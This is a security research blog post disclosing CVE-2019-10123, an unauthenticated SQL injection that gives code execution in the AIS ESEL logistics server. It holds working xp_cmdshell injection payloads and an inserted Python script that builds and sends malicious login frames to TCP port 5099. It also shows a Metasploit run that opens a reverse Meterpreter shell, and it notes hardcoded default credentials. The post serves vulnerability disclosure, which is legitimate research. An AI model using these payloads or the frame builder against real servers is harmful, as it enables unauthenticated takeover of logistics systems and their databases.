Manuel Feifel
CVE-2019-10123: Logistics Software SQLi-RCE
TL;DR

An unauthenticated remote code execution vulnerability was discovered in publicly exposed installations of a logistics software product. The drivers' mobile app talks to the on-premise or cloud backend servers over a custom 'protocol', and the login handling of that protocol is affected by an SQL injection.

Introduction

During an attack simulation in 2019, we discovered an unknown service exposed on TCP port 5099. As we had already gained internal access at the customer, we located the internal server and looked at what was running there. The service was called "ESEL". Examining its files showed that it belongs to a logistics software product from AIS (Advanced InfoData Systems GmbH).
The service is used by mobile apps, but these are not published in the app stores. We therefore had to reverse engineer the server code to understand its functionality.

Reverse Engineering

As the application is written in C#, it could easily be decompiled with ILSpy or a similar tool.

The code shows that the service creates an 'ESELServer' object from ESELLib during startup. Searching through the code, a function called "HandleLogin" looked interesting. It is called by "DecodeMessage", which in turn is called by "HandleMessage".

Message-Format

After analyzing the code, we reconstructed a valid login message. The system uses a custom message format in which the fields are separated by the character ÿ.

Format:
[MSG-LEN]ÿ[MSG-NO => bool flag for ACK]ÿ[DATE-STAMP]ÿ[VERSION]ÿ[MSG-TYP => e.g. login]ÿ[FLAG => ~ACK]ÿ[USERNAME]ÿ[PASSWORD]ÿ[CLIENT]ÿ[CLIENT-INFO ? NOT USED]ÿ

Example:
0085ÿ000000ÿ20170810213226ÿ01ÿ60ÿ02ÿ76a31de7ÿ76a31de7ÿAISmobileAND_1.218ÿ#

A valid message was created and tested against an AIS ESEL server.

We discovered hardcoded AIS credentials in the config files and used them to verify our login message. Because these credentials ship with the product, it is probably possible to authenticate to every reachable server with them; on an ESEL server hosted by AIS itself, they worked too.

NOTE

The databaseConnectionString in the configuration uses the same password for the "sa" account, i.e. the application connects to its database as MSSQL's built-in administrative user "sa". This matters for what follows: anything injected into one of the application's queries runs with sysadmin rights.

Exploit

The following line looked promising for an SQL injection.

Let’s give it a try:

The injection succeeded without modification. That is not yet an RCE, though. However, it is well known that an SQL injection in MSSQL Server can be turned into code execution when the application connects as "sa" (or another sysadmin) and the xp_cmdshell stored procedure can be enabled: sp_configure is used to switch on 'show advanced options' and then 'xp_cmdshell', after which xp_cmdshell runs OS commands under the SQL Server service account.

Password'; USE master; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE --

Password'; exec xp_cmdshell 'echo "hallo" >C:\test' --
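The Python below is an added example and not code from the post, from AIS, or from the Metasploit module. It serves both the Message-Format section and the two payloads above: it parses the login frame listed under Message-Format, rebuilds it with a recomputed MSG-LEN, and drops the stacked-query payloads into the PASSWORD field. Two assumptions are built in and marked in the comments: that a delimiter follows CLIENT-INFO on the wire (the Format line lists one; the printed example ends at '#'), and that MSG-LEN counts the UTF-8 bytes of the whole frame including the four length digits. Under those two assumptions the captured frame comes out at exactly 85 bytes, the value of its own prefix, which is why the builder uses that rule; it has not been checked against a live server. The socket helper is only for hosts you are authorised to test and is not called by the demo.

```python
"""Added example (not code from the post, from AIS, or from the Metasploit
module): parse and rebuild ESEL login frames, then put the post's xp_cmdshell
payloads into the Password field. Framing assumptions are marked below."""
import socket
from typing import Dict, Optional

SEP = "ÿ"  # field delimiter shown in the post (U+00FF)
FIELDS = ("msg_len", "msg_no", "date_stamp", "version", "msg_type",
          "flag", "username", "password", "client", "client_info")

# Constructed copy of the login frame listed in the post. ASSUMPTION: the
# delimiter after CLIENT-INFO, which the Format line lists but the printed
# example omits, is present on the wire. With it, the UTF-8 byte count of the
# whole frame is exactly 85, the value of its own MSG-LEN prefix.
CAPTURED_LOGIN = ("0085ÿ000000ÿ20170810213226ÿ01ÿ60ÿ02ÿ76a31de7ÿ76a31de7ÿ"
                  "AISmobileAND_1.218ÿ#ÿ")


def parse_frame(frame: str) -> Dict[str, str]:
    """Split one frame into its named fields; requires the trailing delimiter."""
    parts = frame.split(SEP)
    if len(parts) != len(FIELDS) + 1 or parts[-1] != "":
        raise ValueError("unexpected field count or missing trailing delimiter")
    return dict(zip(FIELDS, parts[:-1]))


def build_frame(fields: Dict[str, str]) -> str:
    """Serialise fields; fields['msg_len'] is ignored and recomputed.

    ASSUMPTION: MSG-LEN is the zero-padded decimal UTF-8 byte count of the
    entire frame, including the four length digits and every delimiter.
    """
    for name in FIELDS[1:]:
        if SEP in fields[name]:
            # A payload containing the delimiter would shift every later field.
            raise ValueError(f"field {name!r} contains the delimiter")
    body = SEP.join(fields[name] for name in FIELDS[1:]) + SEP
    total = len(f"0000{SEP}{body}".encode("utf-8"))
    if total > 9999:
        raise ValueError("frame too long for a four-digit MSG-LEN")
    return f"{total:04d}{SEP}{body}"


def sql_quote(text: str) -> str:
    """Double single quotes so the text stays inside a T-SQL string literal."""
    return text.replace("'", "''")


def enable_xp_cmdshell_payload() -> str:
    """Stage 1 from the post: close the password literal, enable xp_cmdshell
    via sp_configure, and comment out the remainder of the original query."""
    return ("Password'; USE master; EXEC sp_configure 'show advanced options', 1; "
            "RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE --")


def xp_cmdshell_payload(command: str) -> str:
    """Stage 2 from the post: run an OS command through xp_cmdshell. Quotes in
    the command are doubled so it survives as one T-SQL literal."""
    return f"Password'; EXEC xp_cmdshell '{sql_quote(command)}' --"


def login_frame_with_payload(payload: str,
                             template: Optional[Dict[str, str]] = None) -> str:
    """Copy every field of the captured login frame (or of template) and
    replace the Password field with the injection payload."""
    fields = dict(template or parse_frame(CAPTURED_LOGIN))
    fields["password"] = payload
    return build_frame(fields)


def send_frame(host: str, frame: str, port: int = 5099,
               timeout: float = 5.0) -> bytes:
    """Deliver one frame to the service on TCP/5099 and return the raw reply.
    Not called below; only for hosts you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(frame.encode("utf-8"))
        return sock.recv(4096)


if __name__ == "__main__":
    # Print the two frames that reproduce the post's exploit chain.
    for stage in (enable_xp_cmdshell_payload(),
                  xp_cmdshell_payload('echo "hallo" >C:\\test')):
        print(login_frame_with_payload(stage))
```

Two details are worth keeping in mind when adapting this: any single quote inside the OS command has to be doubled (sql_quote does that), otherwise the T-SQL literal handed to xp_cmdshell ends early; and if the server rejects an old DATE-STAMP, pass a template with a fresh value instead of reusing the captured one.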

After this was successful too, we decided to write a Metasploit module, which makes it easy to execute an arbitrary payload with little effort.

The complete Metasploit exploit needed only a few lines of code: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/ais_esel_server_rce.rb

msf5 > use exploit/windows/misc/ais_esel_server_rce
msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
rhosts => 10.66.75.212
msf5 exploit(windows/misc/ais_esel_server_rce) > check
[+] 10.66.75.212:5099 - The target is vulnerable.
msf5 exploit(windows/misc/ais_esel_server_rce) > run

[*] Started reverse TCP handler on 10.66.75.208:4444
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
...
[*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] Sending stage (179779 bytes) to 10.66.75.212
[*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
[!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
[*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
[*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100

meterpreter > getuid
Server username: NT Service\MSSQL$AIS

Other vulnerabilities

There are also other vulnerabilities that are not discussed in detail here. They mainly concern weak configurations, highly privileged accounts and default passwords.

Disclosure

The vendor did not have a contact or process for reporting security vulnerabilities. After some emails and calls, the SQL injection was fixed in some form. To our knowledge, the other issues were not fixed.

https://labs.infoguard.ch/posts/cve-2019-10123_ais_sqli-rce/
Published at
2019-04-25